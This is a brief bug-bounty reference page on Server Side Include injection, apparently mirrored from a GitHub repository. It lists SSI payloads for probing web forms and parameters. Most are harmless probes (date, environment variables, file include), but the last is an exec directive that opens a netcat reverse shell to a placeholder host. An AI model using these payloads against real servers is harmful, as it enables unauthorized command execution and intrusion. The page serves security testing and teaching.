mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
807 B
807 B
Server Side Include Injection (SSI Injection)
Introduction
SSI (Server Side Includes) Injection is a type of web security vulnerability that occurs when a web application allows untrusted user-supplied data to be used as part of a Server Side Include (SSI) directive
Where to find
Usually it can be found anywhere. Just try to input the payload in the form or GET parameter
How to exploit
- Print a date
<!--#echo var="DATE_LOCAL" -->
- Print all the variabels
<!--#printenv -->
- Include a file
<!--#include file="includefile.html" -->
- Doing a reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->